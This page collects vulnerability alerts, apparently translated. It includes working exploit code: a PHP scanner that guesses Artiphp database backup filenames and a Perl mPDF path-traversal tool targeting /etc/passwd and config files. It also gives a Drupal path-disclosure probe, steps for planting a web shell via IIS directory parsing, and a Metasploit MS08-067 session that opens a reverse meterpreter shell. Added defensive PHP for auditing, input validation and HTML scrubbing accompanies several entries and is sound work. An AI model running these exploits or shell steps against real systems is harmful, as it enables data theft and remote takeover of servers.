Below are seven vulnerability alerts collected on this page, beginning with the Artiphp CMS 5.5.0 database backup disclosure exploit, contributed by "xx".
<?php
/*
Artiphp CMS 5.5.0 Database Backup Disclosure Exploit
Author: Artiphp www.artiphp.com
Affected version: 5.5.0 Neo (r422)
Summary: Artiphp is a content management system (CMS), open
and free, to create and manage your website.
Description: Artiphp stores database backups made with the backupDB utility
under a predictable file name inside the web root, which can be
exploited to disclose sensitive information by downloading the
file. The backup is located in the '/artzone/artpublic/database/'
directory under the file name 'db_backup_[type].[yyyy-mm-dd].sql.gz'.
Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.8 / 5.3.9
MySQL 5.5.20
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
*/
error_reporting(0);

print "\no==========================================================o\n";
print "| |";
print "\n|\tArtiphp CMS 5.5.0 DB Backup Disclosure Exploit |\n";
print "| |\n";
print "|\t\t\tby LiquidWorm |\n";
print "| |";
print "\no==========================================================o\n";

if ($argc < 3)
{
    print "\n\n\x20[*] Usage: php $argv[0] <host> <port>\n\n\n";
    die();
}

$godina_array = array('', '', '');   // years to check (the year values are missing from this copy of the exploit)
$mesec_array  = array('12','11','10','09','08','07','06','05','04','03','02','01');
$dn_array     = array('31','30','29','28','27','26','25','24','23','22','21','20',
                      '19','18','17','16','15','14','13','12','11','10','09','08',
                      '07','06','05','04','03','02','01');
$backup_array = array('full','structure','partial');

$host = $argv[1];
$port = intval($argv[2]);
$path = "/artiphp/artzone/artpublic/database/"; // change per need.

$alert1 = "\033[0;31m";
$alert2 = "\033[0;37m";

foreach ($godina_array as $godina)
{
    print "\n\n\x20[*] Checking year: " . $godina . "\n\n Scanning: ";
    sleep(2);
    foreach ($mesec_array as $mesec)
    {
        foreach ($dn_array as $dn)
        {
            print "~";
            foreach ($backup_array as $backup)
            {
                // Candidate backup name for this type and date.
                $url = "http://" . $host . ":" . $port . $path
                     . "db_backup_" . $backup . "." . $godina . "-" . $mesec . "-" . $dn . ".sql.gz";
                if (file_get_contents($url))
                {
                    print "\n\n\x20[!] DB backup file discovered!\n\n";
                    echo $alert1;
                    print "\x20==>\x20";
                    echo $alert2;
                    die($url . "\n");
                }
            }
        }
    }
}

print "\n\n\x20[*] Zero findings.\n\n\n";
?>
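The weakness in the advisory above is a date-based, guessable file name sitting under the document root. As an added defensive example (my code, not Artiphp's), the following PHP shows the two controls an operator wants: an audit that lists every database dump reachable under a web root, and a backup path builder that keeps dumps outside the web root under a name that cannot be enumerated by date. The paths /var/www/html and /var/backups/artiphp in the usage lines are assumptions; random_bytes() requires PHP 7 or later.

```php
<?php
// Added defensive example for the Artiphp backup-disclosure issue; not Artiphp's code.
// find_exposed_dumps(): walk a document root and list any .sql / .sql.gz file a
//   browser could fetch by URL (covers db_backup_[type].[yyyy-mm-dd].sql.gz).
// safe_backup_path(): build a destination outside the web root whose name carries
//   128 random bits, so knowing the type and date is not enough to guess it.
// Directory values used below are assumptions for illustration.

function find_exposed_dumps(string $docroot): array
{
    if (!is_dir($docroot)) {
        return [];
    }
    $found = [];
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($docroot, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($iter as $file) {
        // Any SQL dump under the web root is downloadable unless the server blocks it.
        if (preg_match('/\.sql(\.gz)?$/i', $file->getFilename())) {
            $found[] = $file->getPathname();
        }
    }
    sort($found);
    return $found;
}

function safe_backup_path(string $backupDir, string $type): string
{
    if (!in_array($type, ['full', 'structure', 'partial'], true)) {
        throw new InvalidArgumentException("unknown backup type: $type");
    }
    // Owner-only directory outside the document root; create it if missing.
    if (!is_dir($backupDir) && !mkdir($backupDir, 0700, true)) {
        throw new RuntimeException("cannot create $backupDir");
    }
    $token = bin2hex(random_bytes(16));   // 32 hex chars of CSPRNG output
    return rtrim($backupDir, '/') . "/db_backup_{$type}." . date('Y-m-d') . ".{$token}.sql.gz";
}

// Usage (assumed paths): audit the document root, then pick a safe destination.
foreach (find_exposed_dumps('/var/www/html') as $exposed) {
    echo "EXPOSED: $exposed\n";
}
echo safe_backup_path('/var/backups/artiphp', 'full'), "\n";
```

Moving the dump out of the web root is the real fix; the random token is defence in depth for the case where an operator still points the backup directory somewhere served by the web server. Running the audit from a cron job and alerting on a non-empty result catches regressions after upgrades.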
Apple QuickTime Information Disclosure Vulnerability Alert
Published: 2011-10-28
Updated: 2011-10-28
Affected systems:
Apple QuickTime Player 7.x
Unaffected systems:
Apple QuickTime Player 7.7.1
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 50130
CVE ID: CVE-2011-3220
QuickTime is a multimedia framework developed by Apple that handles many kinds of digital video, media clips, sound, text, animation and music formats, as well as several types of interactive panoramic images.
Apple QuickTime has an uninitialized memory access issue in the URL data handler for video files; an attacker can exploit it to read memory contents.
<*Source: Luigi Auriemma (aluigi@pivx.com)
Link: support.apple.com/kb/HT5016
*>
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Apple
-----
The vendor has released an update that fixes this security issue; download it from the vendor's home page:
support.apple.com/
Drupal 7.14 <= Full Path Disclosure Vulnerability
About Drupal:
"Drupal is an open source content management platform, powering millions of websites and
applications. It's built, used, and supported by an active and diverse community of people
around the world."
Drupal is used by well-known organizations such as ING-DiBa, Amnesty International and The White House.
Issue: Full Path Disclosure
Risk level: Medium
A remote attacker can learn the full local path of the Drupal installation.
This information can be used to prepare further attacks against the server.
In includes/bootstrap.inc, line 2695:
-------------------------------------
function request_path() {
  static $path;

  if (isset($path)) {
    return $path;
  }

  if (isset($_GET['q'])) {
    // This is a request with a ?q=foo/bar query string. $_GET['q'] is
    // overwritten in drupal_path_initialize(), but request_path() is called
    // very early in the bootstrap process, so the original value is saved in
    // $path and returned in later calls.
    $path = $_GET['q'];
  }
  elseif (isset($_SERVER['REQUEST_URI'])) {
    // This request is either a clean URL, or 'index.php', or nonsense.
    // Extract the path from REQUEST_URI.
    $request_path = strtok($_SERVER['REQUEST_URI'], '?');
    $base_path_len = strlen(rtrim(dirname($_SERVER['SCRIPT_NAME']), '\/'));
    // Unescape and strip $base_path prefix, leaving q without a leading slash.
    $path = substr(urldecode($request_path), $base_path_len + 1);
    // If the path equals the script filename, either because 'index.php' was
    // explicitly provided in the URL, or because the server added it to
    // $_SERVER['REQUEST_URI'] even when it wasn't provided in the URL (some
    // versions of Microsoft IIS do this), the front page should be served.
    if ($path == basename($_SERVER['PHP_SELF'])) {
      $path = '';
    }
  }
  else {
    // This is the front page.
    $path = '';
  }

  // Under certain conditions Apache's RewriteRule directive prepends the value
  // assigned to $_GET['q'] with a slash. Moreover we can always have a trailing
  // slash in place, hence we need to normalize $_GET['q'].
  $path = trim($path, '/');

  return $path;
}
-------------------------------------
Exploit / Proof Of Concept:
www.xxx.com /?q[]=x
-------------------------------------
Fix:
Search for:
$path = trim($path, '/');
And add the following line above:
if(is_array($path)) { die(); }
-------------------------------------
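The disclosure works because ?q[]=x makes $_GET['q'] an array, trim() then raises a PHP warning, and a server that displays errors prints that warning together with the absolute path of bootstrap.inc. The fix quoted above stops the first half with die(). As an added example (my code, not Drupal's; function names are my own), the PHP below pairs that type check with a check of the php.ini settings that decide whether a warning ever reaches the response body.

```php
<?php
// Added example, not Drupal's code. Two defences that belong together for this
// class of full-path disclosure:
//  1. reject non-string query parameters before they reach string functions;
//  2. verify that PHP logs warnings instead of displaying them.

function string_query_param(array $get, string $name, string $default = ''): string
{
    if (!array_key_exists($name, $get)) {
        return $default;
    }
    // PHP turns ?name[]=x into an array; that is a malformed request, not a path.
    // The fix above calls die(); answering 400 is the same idea with a proper status.
    if (!is_string($get[$name])) {
        http_response_code(400);
        exit;
    }
    return trim($get[$name], '/');
}

function error_display_is_safe(): bool
{
    // display_errors may be "1", "0", "", "On", "Off", "stderr" or "stdout";
    // anything that writes into the HTTP response body leaks paths on error.
    $display = strtolower(trim((string) ini_get('display_errors')));
    $shown   = !in_array($display, ['', '0', 'off', 'stderr'], true);
    $logged  = filter_var(ini_get('log_errors'), FILTER_VALIDATE_BOOLEAN);
    return !$shown && $logged;
}

// Usage: normalise the path parameter and flag an unsafe error configuration.
$q = string_query_param($_GET, 'q');
if (!error_display_is_safe()) {
    error_log('php.ini: display_errors must be Off and log_errors On in production');
}
```

With display_errors=Off the warning from a ?q[]=x request still goes to the error log, which is where a defender wants it: the probe is visible to monitoring, and nothing about the filesystem layout is returned to the client.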
Title: mPDF <= 5.3 File Disclosure
Author: ZadYree
Download: www.mpdf1.com/mpdf/download
Affected versions: 5.3 and prior
Tested on: multiple
#!/usr/bin/perl -U

=head1 TITLE

mPDF <= 5.3 File Disclosure Exploit (0day)

=head2 SYNOPSIS

-- examples/show_code.php --
preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m); <--- URI improperly filtered.
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));
if (!$num || !$title) { die("Invalid file"); }

=head2 DESCRIPTION

This vulnerability, due to a weak filter, lets you download any unprotected remote
content in PDF format.
The exploit may not work, depending on the htaccess/chmod rules set up on the
remote server.

=head2 USAGE

perl exploit.pl -r www.2cto.com /mpdf53/ ../config.php
perl exploit.pl -a p00niez.com/mpdf53/ /etc/passwd

Required modules:
PDF::OCR2
LWP::Simple
File::Type

Download a module:
sudo cpan -fi install Module::Name

=head3 Author

Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog

=head3 Thanks

PHDays CTF - Yes, CTFs sometimes do give you 0dayz
3LRVS Team - Support

=cut

#************* Configuration **************#
my $pdf_file = '/tmp/b00m.pdf';
$PDF::OCR2::CHECK_PDF = 0;
my $del_temp_file = 1;
#******************************************#

use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE  => 1;
use constant FALSE => 0;

help() unless (@ARGV >= 2);
my (%optz, $uri);
getopts('rah', \%optz);
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help     = $optz{'h'};
help() if ($help);                        # -h: show usage before doing anything else
help() unless ($absolute || $relative);   # (fixed: variable was misspelled $relatife)
my ($purl, $fpath) = @ARGV;

# Output file name derived from the host part of the URL.
my $name = $purl;
$name =~ s{(.+?)/.*}{$1};
$name .= ("_" . localtime(time) . ".txt");

$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);
help() unless ($uri);

my $furl = $purl . $uri . $fpath;
my $i = 0;
$furl =~ s#(//)#$i++ ? "/" : $1#eg;   # collapse every "//" except the first one. Yeah that's twisted.

say "[*]Retrieving content...";
my $file = make_file(get($furl));
die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file);

say "[+]OK\012[*]Converting format...";
my $pdf  = PDF::OCR2->new($file);
my $text = $pdf->text;
$text =~ s/[^\x0A-\x7F]+?//gm;        # keep printable ASCII and newlines only

open(my $fh, '>', $name) or die "[-]Cannot write $name: $!\n";
print $fh $text;
close($fh);
say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name;
unlink($pdf_file) if ($del_temp_file == TRUE);

# Write the downloaded body to the temporary PDF path and return that path.
sub make_file {
    my $content = shift;
    open(my $out, '>', $pdf_file) or die "[-]Cannot write $pdf_file: $!\n";
    print $out $content if defined $content;
    close($out);
    return($pdf_file);
}

# True when File::Type identifies the file as a PDF.
sub is_pdf {
    my $checked_file = shift;
    my $ft = File::Type->new();
    return(1) if ($ft->mime_type($checked_file) eq "application/pdf");
    return(0);
}

sub help {
    say <<"EOF";
Usage: perl $0 [-r|-a] [mPDF URL]
Details:
-r : Relative path (ex: ../file.php)
-a : Absolute path (ex: /etc/file.zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
    exit(0);
}
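The root cause named in the SYNOPSIS is an unanchored regular expression: the pattern only has to occur somewhere in the filename, so the traversal suffix the exploit appends passes straight through. As an added example (my code, not mPDF's; function names and the /srv/mpdf/examples path are assumptions), the PHP below places the quoted check next to a hardened one that anchors the pattern, restricts the title characters and verifies the canonical path is still inside the examples directory.

```php
<?php
// Added example, not mPDF's code.
// vulnerable_filter(): the check quoted in the exploit's SYNOPSIS. It returns the
//   filename unchanged whenever the pattern occurs anywhere inside it.
// hardened_filter(): whole-string match, title limited to [A-Za-z0-9_], and a
//   containment check on realpath() output rather than on the user string.
// $examplesDir is an assumed location for illustration.

function vulnerable_filter(string $filename): ?string
{
    if (!preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/', $filename, $m)) {
        return null;
    }
    $num   = intval($m[1]);
    $title = ucfirst(preg_replace('/_/', ' ', $m[2]));
    if (!$num || !$title) {
        return null;
    }
    return $filename;   // accepted as-is, any trailing path components included
}

function hardened_filter(string $filename, string $examplesDir): ?string
{
    // Anchored at both ends; no '/', '.', NUL or other separator can appear in the title.
    if (!preg_match('/^example0?(\d+)_([A-Za-z0-9_]+)\.php$/', $filename, $m)) {
        return null;
    }
    $base      = realpath($examplesDir);
    $candidate = realpath($examplesDir . DIRECTORY_SEPARATOR . $filename);
    if ($base === false || $candidate === false) {
        return null;    // directory or file does not exist
    }
    // Compare canonical paths so symlinks and ".." cannot escape the base directory.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed probe using the traversal string from the exploit above.
$probe = 'example03_LRVS.php/../../../../../../../../etc/passwd';
var_dump(vulnerable_filter($probe));                      // weak check: passes the probe through
var_dump(hardened_filter($probe, '/srv/mpdf/examples'));  // hardened check: rejects it
```

Run against the probe, vulnerable_filter() returns the string untouched while hardened_filter() returns null; for a legitimate name such as example03_LRVS.php the hardened version returns the canonical path only if that file actually exists under the examples directory. The realpath() containment check is what matters once the regex is fixed: it guards against any future bypass of the name pattern rather than trusting the pattern alone.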
From: www.4safer.com
SQL backup: when I saw this page I had an idea.
Look at item 1 in the figure, which is the storage directory. Then item 2, which says that if the directory does not exist the system creates it automatically, so the directory name is something we can write. Then item 3, which says the system automatically generates a readme.txt file;
by now everyone surely has ideas. I thought of the IIS parsing vulnerability: enter z.asp as the directory and put your own ASP or PHP shell in the backup description. Then click "manage backup directory"
and "view backup description" and you can see your shell. Done.
This vulnerability has been public for a long time, so I won't explain how it works here (I couldn't anyway); I'll just run it through Metasploit. Experts, please skip this.
root@bt:~# genlist -s 10.10.10.*
10.10.10.1
10.10.10.2
10.10.10.128
10.10.10.130
10.10.10.254
root@bt:~# nmap -sS -Pn 10.10.10.128
Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT
Nmap scan report for attacker.dvssc.com (10.10.10.128)
Host is up (0.0000060s latency).
All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
root@bt:~# nmap -sS -Pn 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.011s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
root@bt:~#
root@bt:~# nmap --script=smb-check-vulns 10.10.10.130
Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT
Nmap scan report for service.dvssc.com (10.10.10.130)
Host is up (0.00032s latency).
Not shown: 985 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
777/tcp open multiling-http
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1521/tcp open oracle
6002/tcp open X11:2
7001/tcp open afs3-callback
7002/tcp open afs3-prserver
8099/tcp open unknown
MAC Address: 00:0C:29:D3:08:A0 (VMware)
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)
| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
root@bt:~# msfconsole
Call trans opt: received. 2-19-98 13:24:18 REC:Loc
Trace program: running
wake up, Neo...
the matrix has you
follow the white rabbit.
knock, knock, Neo.
=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops
msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi -10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption
msf >use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >set RHOST 10.10.10.130
RHOST =>10.10.10.130
msf exploit(ms08_067_netapi) >set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD =>windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) >show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.10.10.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) >set LHOST 10.10.10.128
LHOST =>10.10.10.128
msf exploit(ms08_067_netapi) >exploit
[*] Started reverse handler on 10.10.10.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows - No Service Pack - lang:Unknown
[*] Selected Target: Windows 2003 SP0 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 10.10.10.130
[*] Meterpreter session 1 opened (10.10.10.128:4444 ->10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
Author: aullik5
Original source: hi.baidu.com/aullik5/blog ... a02c6785352416.html
XSIO Vulnerability Alert
The vulnerability I'm going to talk about today is a very sneaky one.
Most websites have it, not only Baidu.
What is XSIO, and why call it sneaky?
XSIO arises because the position property of images is not prevented from being absolute, so a single image can be made to appear anywhere on the page.
That image can then be used to cover any spot on the page, including the site's banner, a link or a button.
This can deface the page, and once the image is given a link it obviously works as a phishing vector.
The XSIO vulnerability:
Because ordinary HTML tags are not filtered, those tags can be used to carry out an XSIO attack.
On Baidu a blog post sits inside a table, so we first have to close the table and then insert a suitable image.
For example, the following code:
[code sample not preserved on this page]
[Screenshot: 百度.jpg, 2008-10-21 20:50]
As shown in the figure: I placed the anonymous user's avatar over the banner.
In an actual attack the image can be placed over a link or the banner; when someone clicks what used to be the link or button, they are sent to our malicious site.
So this is a very sneaky vulnerability!
To find out what happens next, wait for the next installment!
PS: this was purely a personal activity, unrelated to any organization or group.
Starting tomorrow we begin our XSS journey.
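The post's own diagnosis is that the site lets user content set position:absolute on an image and does not keep the content inside its table. As an added defensive example (my code, not the author's), the PHP below parses user-supplied HTML into a DOM, removes every position declaration from inline styles, drops embedded <style> elements, and re-serialises the fragment. Re-serialising from the DOM also discards the stray </table> used to break out of the post container, because the HTML parser ignores an end tag with no matching open element. The function name and the sample markup are my own.

```php
<?php
// Added defensive example for XSIO; not code from the original post.
// Parses untrusted HTML, strips CSS positioning that can move an element over
// the page's banner, links or buttons, and returns the cleaned fragment.
// Uses only PHP's bundled DOM extension.

function neutralise_xsio(string $userHtml): string
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate sloppy user markup without warnings
    $doc->loadHTML('<?xml encoding="utf-8"?><div id="frag">' . $userHtml . '</div>');
    libxml_clear_errors();
    $xpath = new DOMXPath($doc);

    // 1. Embedded stylesheets can position anything; drop them outright.
    foreach ($xpath->query('//style') as $styleEl) {
        $styleEl->parentNode->removeChild($styleEl);
    }

    // 2. Remove every "position: ..." declaration from inline styles, keep the rest.
    //    Without position, top/left/right/bottom offsets have no effect.
    foreach ($xpath->query('//*[@style]') as $el) {
        $clean = preg_replace('/position\s*:\s*[^;]+;?/i', '', $el->getAttribute('style'));
        $clean = trim($clean, " ;\t\r\n");
        if ($clean === '') {
            $el->removeAttribute('style');
        } else {
            $el->setAttribute('style', $clean);
        }
    }

    // 3. Serialise only the children of the wrapper div.
    $frag = $xpath->query('//div[@id="frag"]')->item(0);
    $out  = '';
    foreach ($frag->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample resembling the technique described in the post:
// a stray </table> to escape the container, then a linked, absolutely positioned image.
$sample = '</table><a href="http://phish.example/"><img src="avatar.jpg" '
        . 'style="position:absolute; top:0; left:0; width:800px"></a>';
echo neutralise_xsio($sample), "\n";
```

Scrubbing inline styles is the minimal fix that matches the post's diagnosis. The more robust design is an allow-list sanitiser that drops the style attribute (and any non-allow-listed tag) entirely, since negative margins, transforms and z-index offer other ways to move content once any styling is permitted.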
★ dedecms 5.7 edit.inc.php file injection vulnerability alert